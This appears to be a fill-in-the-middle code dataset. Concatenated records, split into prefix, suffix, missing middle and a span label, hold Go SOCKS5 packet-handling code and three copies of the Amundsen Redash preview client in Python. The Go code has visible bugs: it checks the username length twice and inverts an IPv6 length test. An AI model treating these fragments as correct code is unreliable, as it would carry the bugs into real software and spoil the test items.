if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
|
buf = append(buf, []byte(cmd.Host). | conditional_block |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
|
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id) | conditional_block |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class | (Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method.
The template values in the Redash query will be filled by the `build_redash_query_params`
function.
"""
def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
query_result_id = self._wait_for_query_finish(job_id=query_results['job']['id'])
query_results = self._get_query_results(query_result_id=query_result_id)
columns = [ColumnItem(c['name'], c['type']) for c in query_results['query_result']['data']['columns']]
preview_data = PreviewData(columns, query_results['query_result']['data']['rows'])
data = PreviewDataSchema().dump(preview_data)
PreviewDataSchema().load(data) # for validation only
payload = jsonify({'preview_data': data})
return make_response(payload, HTTPStatus.OK)
except Exception as e:
LOGGER.error('ERROR getting Redash preview: %s', e)
return make_response(jsonify({'preview_data': {}}), HTTPStatus.INTERNAL_SERVER_ERROR)
def get_feature_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
pass
| RedashApiResponse | identifier_name |
base_redash_preview_client.py | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import abc
from enum import Enum
import logging
import requests as r
import time
from flask import Response as FlaskResponse, make_response, jsonify
from http import HTTPStatus
from typing import Any, Dict, Optional, Tuple
from amundsen_application.base.base_preview_client import BasePreviewClient
from amundsen_application.models.preview_data import ColumnItem, PreviewData, PreviewDataSchema
LOGGER = logging.getLogger(__name__)
REDASH_SUBMIT_QUERY_ENDPOINT = '{redash_host}/api/queries/{query_id}/results'
REDASH_TRACK_JOB_ENDPOINT = '{redash_host}/api/jobs/{job_id}'
REDASH_QUERY_RESULTS_ENDPOINT = '{redash_host}/api/query_results/{query_result_id}'
class RedashApiKeyNotProvidedException(Exception):
pass
class RedashQueryCouldNotCompleteException(Exception):
pass
class RedashQueryTemplateDoesNotExistForResource(Exception):
pass
class RedashApiResponse(Enum):
PENDING = 1 # (waiting to be executed)
STARTED = 2 # (executing)
SUCCESS = 3
FAILURE = 4
CANCELLED = 5
class BaseRedashPreviewClient(BasePreviewClient):
"""
Generic client for using Redash as a preview client backend.
Redash does not allow arbitrary queries to be submitted but it does allow
the creation of templated queries that can be saved and referenced. Amundsen
uses these templated queries to pass in arguments such as the schema name
and table name in order to dynamically build a query on the fly.
The suggested format of the query template is:
select {{ SELECT_FIELDS }}
from {{ SCHEMA_NAME }}.{{ TABLE_NAME }}
{{ WHERE_CLAUSE }}
limit {{ RCD_LIMIT }}
You will need to use the params (e.g. database, cluster, schema and table names)
to idenfiy the specific query ID in Redash to use. This is done via the
`get_redash_query_id` method. | def __init__(self, redash_host: str, user_api_key: Optional[str] = None) -> None:
self.redash_host = redash_host
self.user_api_key: Optional[str] = user_api_key
self.headers: Optional[Dict] = None
self.default_query_limit = 50
self.max_redash_cache_age = 86400 # One day
@abc.abstractmethod
def get_redash_query_id(self, params: Dict) -> Optional[int]:
"""
Retrieves the query template that should be executed for the given
source / database / schema / table combination.
Redash Connections are generally unique to the source and database.
For example, Snowflake account that has two databases would require two
separate connections in Redash. This would require at least one query
template per connection.
The query ID can be found in the URL of the query when using the Redash GUI.
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: the ID for the query in Redash. Can be None if one does not exist.
"""
pass # pragma: no cover
def _build_headers(self, params: Dict) -> None:
"""
Generates the headers to use for the API invocation. Attemps to use a
Query API key, if it exists, then falls back to a User API if no
query API key is returned.
Background on Redash API keys: https://redash.io/help/user-guide/integrations-and-api/api
"""
api_key = self._get_query_api_key(params) or self.user_api_key
if api_key is None:
raise RedashApiKeyNotProvidedException('No API key provided')
self.headers = {"Authorization": "Key {}".format(api_key)}
def _get_query_api_key(self, params: Dict) -> Optional[str]:
"""
This function can be overridden by sub classes to look up the specific
API key to use for a given database / cluster / schema / table combination.
"""
return None
def get_select_fields(self, params: Dict) -> str:
"""
Allows customization of the fields in the select clause. This can be used to
return a subset of fields or to apply functions (e.g. to mask data) on a
table by table basis. Defaults to `*` for all fields.
This string should be valid SQL AND fit BETWEEN the brackets `SELECT {} FROM ...`
:param params: A dictionary of input parameters containing the database,
cluster, schema and tableName
:returns: a string corresponding to fields to select in the query
"""
return '*'
def get_where_clause(self, params: Dict) -> str:
"""
Allows customization of the 'WHERE' clause to be provided for each set of parameters
by the client implementation. Defaults to an empty string.
"""
return ''
def build_redash_query_params(self, params: Dict) -> Dict:
"""
Builds a dictionary of parameters that will be injected into the Redash query
template. The keys in this dictionary MUST be a case-sensitive match to the
template names in the Redash query and you MUST have the exact same parameters,
no more, no less.
Override this function to provide custom values.
"""
return {
'parameters': {
'SELECT_FIELDS': self.get_select_fields(params),
'SCHEMA_NAME': params.get('schema'),
'TABLE_NAME': params.get('tableName'),
'WHERE_CLAUSE': self.get_where_clause(params),
'RCD_LIMIT': str(self.default_query_limit)
},
'max_age': self.max_redash_cache_age
}
def _start_redash_query(self, query_id: int, query_params: Dict) -> Tuple[Any, bool]:
"""
Starts a query in Redash. Returns a job ID that can be used to poll for
the job status.
:param query_id: The ID of the query in the Redash system. This can
be retrieved by viewing the URL for your query template in the
Redash GUI.
:param query_params: A dictionary of parameters to inject into the
corresponding query's template
:return: A tuple of the response object and boolean. The response object
changes based off of whether or not the result from Redash came from
the cache.
The boolean is True if the result came from the Redash cache, otherwise False.
"""
url_inputs = {'redash_host': self.redash_host, 'query_id': query_id}
query_url = REDASH_SUBMIT_QUERY_ENDPOINT.format(**url_inputs)
resp = r.post(query_url, json=query_params, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Response from redash query: %s', resp_json)
# When submitting a query, Redash can return 2 distinct payloads. One if the
# query result has been cached by Redash and one if the query was submitted
# to be executed. The 'job' object is returned if the query is not cached.
if 'job' in resp_json:
redash_cached = False
else:
redash_cached = True
return resp_json, redash_cached
def _wait_for_query_finish(self, job_id: str, max_wait: int = 60) -> str:
"""
Waits for the query to finish and validates that a successful response is returned.
:param job_id: the ID for the job executing the query
:return: a query result ID tha can be used to fetch the results
"""
url_inputs = {'redash_host': self.redash_host, 'job_id': job_id}
query_url = REDASH_TRACK_JOB_ENDPOINT.format(**url_inputs)
query_result_id: Optional[str] = None
max_time = time.time() + max_wait
while time.time() < max_time:
resp = r.get(query_url, headers=self.headers)
resp_json = resp.json()
LOGGER.debug('Received response from Redash job %s: %s', job_id, resp_json)
job_info = resp_json['job']
job_status = RedashApiResponse(job_info['status'])
if job_status == RedashApiResponse.SUCCESS:
query_result_id = job_info['query_result_id']
break
elif job_status == RedashApiResponse.FAILURE:
raise RedashQueryCouldNotCompleteException(job_info['error'])
time.sleep(.5)
if query_result_id is None:
raise RedashQueryCouldNotCompleteException('Query execution took too long')
return query_result_id
def _get_query_results(self, query_result_id: str) -> Dict:
"""
Retrieves query results from a successful query run
:param query_result_id: ID returned by Redash after a successful query execution
:return: A Redash response dictionary
"""
url_inputs = {'redash_host': self.redash_host, 'query_result_id': query_result_id}
results_url = REDASH_QUERY_RESULTS_ENDPOINT.format(**url_inputs)
resp = r.get(results_url, headers=self.headers)
return resp.json()
def get_preview_data(self, params: Dict, optionalHeaders: Dict = None) -> FlaskResponse:
"""
Returns a FlaskResponse object, where the response data represents a json object
with the preview data accessible on 'preview_data' key. The preview data should
match amundsen_application.models.preview_data.PreviewDataSchema
"""
LOGGER.debug('Retrieving preview data from Redash with params: %s', params)
try:
query_id = self.get_redash_query_id(params)
if query_id is None:
raise RedashQueryTemplateDoesNotExistForResource('Could not find query for params: %s', params)
# Build headers to use the Query API key or User API key
self._build_headers(params)
query_params = self.build_redash_query_params(params)
query_results, cached_result = self._start_redash_query(query_id=query_id, query_params=query_params)
# Redash attempts to use internal caching. The format of the response
# changes based on whether or not a cached response is returned
if not cached_result:
